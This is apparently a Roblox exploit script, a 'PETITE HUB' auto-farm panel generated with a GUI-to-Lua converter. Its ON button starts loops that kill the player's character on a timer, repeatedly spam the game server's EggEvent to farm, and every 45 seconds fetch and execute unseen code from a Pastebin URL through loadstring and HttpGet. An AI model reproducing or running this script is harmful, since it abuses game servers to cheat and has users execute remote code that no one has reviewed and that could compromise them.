-- Gui to Lua
-- Version: 3.2

-- Instances:

local botton = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local ON = Instance.new("TextButton")
local UICorner = Instance.new("UICorner")
local OFF = Instance.new("TextButton")
local UICorner_2 = Instance.new("UICorner")
local UICorner_3 = Instance.new("UICorner")
local ImageButton = Instance.new("ImageButton")
local UICorner_4 = Instance.new("UICorner")
local TextLabel = Instance.new("TextLabel")
local UICorner_5 = Instance.new("UICorner")
local TextLabel_2 = Instance.new("TextLabel")
local UICorner_6 = Instance.new("UICorner")
local TextLabel_3 = Instance.new("TextLabel")

--Properties:

botton.Name = "botton"
botton.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
botton.ResetOnSpawn = false

Frame.Parent = botton
Frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Frame.Position = UDim2.new(0.164779961, 0, 0.0884238929, 0)
Frame.Size = UDim2.new(0, 222, 0, 150)

ON.Name = "ON"
ON.Parent = Frame
ON.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
ON.Position = UDim2.new(0.0549999997, 0, 0.583333373, 0)
ON.Size = UDim2.new(0, 57, 0, 50)
ON.Font = Enum.Font.SourceSans
ON.Text = "ON"
ON.TextColor3 = Color3.fromRGB(0, 0, 0)
ON.TextScaled = true
ON.TextSize = 14.000
ON.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)
ON.TextStrokeTransparency = 0.400
ON.TextWrapped = true

UICorner.Parent = ON

OFF.Name = "OFF"
OFF.Parent = Frame
OFF.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
OFF.Position = UDim2.new(0.665000021, 0, 0.583333373, 0)
OFF.Size = UDim2.new(0, 57, 0, 50)
OFF.Font = Enum.Font.SourceSans
OFF.Text = "OFF"
OFF.TextColor3 = Color3.fromRGB(0, 0, 0)
OFF.TextScaled = true
OFF.TextSize = 14.000
OFF.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)
OFF.TextStrokeTransparency = 0.400
OFF.TextWrapped = true

UICorner_2.Parent = OFF

UICorner_3.Parent = Frame

ImageButton.Parent = Frame
ImageButton.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
ImageButton.BackgroundTransparency = 1.000
ImageButton.Position = UDim2.new(0.8556301, 0, 0, 0)
ImageButton.Size = UDim2.new(0, 32, 0, 32)
ImageButton.ZIndex = 2
ImageButton.Image = "http://www.roblox.com/asset/?id=290575049"

UICorner_4.CornerRadius = UDim.new(0, 40)
UICorner_4.Parent = ImageButton

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(53, 53, 53)
TextLabel.Size = UDim2.new(0, 222, 0, 33)
TextLabel.Font = Enum.Font.Ubuntu
TextLabel.Text = ""
TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextWrapped = true

UICorner_5.Parent = TextLabel

TextLabel_2.Parent = TextLabel
TextLabel_2.BackgroundColor3 = Color3.fromRGB(53, 53, 53)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.Position = UDim2.new(0.131923079, 0, 0, 0)
TextLabel_2.Size = UDim2.new(0, 160, 0, 33)
TextLabel_2.Font = Enum.Font.Ubuntu
TextLabel_2.Text = "PETITE HUB"
TextLabel_2.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 14.000
TextLabel_2.TextWrapped = true

UICorner_6.Parent = TextLabel_2

TextLabel_3.Parent = Frame
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.Position = UDim2.new(0.193693683, 0, 0.278805226, 0)
TextLabel_3.Size = UDim2.new(0, 135, 0, 39)
TextLabel_3.Font = Enum.Font.SourceSans
TextLabel_3.Text = "FARM"
TextLabel_3.TextColor3 = Color3.fromRGB(170, 255, 255)
TextLabel_3.TextScaled = true
TextLabel_3.TextSize = 14.000
TextLabel_3.TextStrokeColor3 = Color3.fromRGB(0, 255, 255)
TextLabel_3.TextStrokeTransparency = 0.000
TextLabel_3.TextWrapped = true

-- Scripts:

local function VSTJ_fake_script() -- ON.LocalScript 
	local script = Instance.new('LocalScript', ON)

	--------------------------------re---------------
	script.Parent.MouseButton1Click:Connect(function()
		_G.re = true
		while _G.re == true do
			while wait() do
				game.Players.LocalPlayer.Character.Humanoid.Health = 0 
				wait(37)
			end	
		end
	end)
	--------------------------lag-------------------
	script.Parent.MouseButton1Click:Connect(function()
		_G.fps = true
		while _G.fps == true do
			while wait() do
				loadstring(game:HttpGet("https://pastebin.com/raw/6vs69JUg"))()
				wait(45)
			end	
		end
	end)
	-------------------------------farm--------------
	script.Parent.MouseButton1Click:Connect(function()
		_G.farm = true
		while _G.farm == true do
			while wait() do
				local Event = game:GetService("ReplicatedStorage").EggEvent
				Event:FireServer()
				wait()
			end	
		end
	end)
	
	
	
	
	
end
coroutine.wrap(VSTJ_fake_script)()
local function NDPTKZ_fake_script() -- OFF.LocalScript 
	local script = Instance.new('LocalScript', OFF)

	
	script.Parent.MouseButton1Click:Connect(function()
		_G.re = false
		while _G.re == true do
			while wait() do
				game.Players.LocalPlayer.Character.Humanoid.Health = 0 
				wait(37)
			end	
		end
	end)
	--------------------------lag-------------------
	script.Parent.MouseButton1Click:Connect(function()
		_G.fps = false
		while _G.fps == true do
			while wait() do
				loadstring(game:HttpGet("https://pastebin.com/raw/6vs69JUg"))()
				wait(45)
			end	
		end
	end)
	-------------------------------farm--------------
	script.Parent.MouseButton1Click:Connect(function()
		_G.farm = false
		while _G.farm == true do
			while wait() do
				local Event = game:GetService("ReplicatedStorage").EggEvent
				Event:FireServer()
				wait()
			end	
		end
	end)
end
coroutine.wrap(NDPTKZ_fake_script)()
local function DHJXK_fake_script() -- ImageButton.fechar 
	local script = Instance.new('LocalScript', ImageButton)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Visible = false
	end)
	
	
	
	
end
coroutine.wrap(DHJXK_fake_script)()
local function IXDZ_fake_script() -- Frame.LocalScript 
	local script = Instance.new('LocalScript', Frame)

	local dragger = {}; 
	local resizer = {};
	
	do
		local mouse = game:GetService("Players").LocalPlayer:GetMouse();
		local inputService = game:GetService('UserInputService');
		local heartbeat = game:GetService("RunService").Heartbeat;
		-- // credits to Ririchi / Inori for this cute drag function :)
		function dragger.new(frame)
		    local s, event = pcall(function()
		    	return frame.MouseEnter
		    end)
	
		    if s then
		    	frame.Active = true;
	
		    	event:connect(function()
		    		local input = frame.InputBegan:connect(function(key)
		    			if key.UserInputType == Enum.UserInputType.MouseButton1 then
		    				local objectPosition = Vector2.new(mouse.X - frame.AbsolutePosition.X, mouse.Y - frame.AbsolutePosition.Y);
		    				while heartbeat:wait() and inputService:IsMouseButtonPressed(Enum.UserInputType.MouseButton1) do
		    					frame:TweenPosition(UDim2.new(0, mouse.X - objectPosition.X + (frame.Size.X.Offset * frame.AnchorPoint.X), 0, mouse.Y - objectPosition.Y + (frame.Size.Y.Offset * frame.AnchorPoint.Y)), 'Out', 'Quad', 0.1, true);
		    				end
		    			end
		    		end)
	
		    		local leave;
		    		leave = frame.MouseLeave:connect(function()
		    			input:disconnect();
		    			leave:disconnect();
		    		end)
		    	end)
		    end
		end
		
		function resizer.new(p, s)
			p:GetPropertyChangedSignal('AbsoluteSize'):connect(function()
				s.Size = UDim2.new(s.Size.X.Scale, s.Size.X.Offset, s.Size.Y.Scale, p.AbsoluteSize.Y);
			end)
		end
	end
	script.Parent.Active = true
	script.Parent.Draggable = true
end
coroutine.wrap(IXDZ_fake_script)()
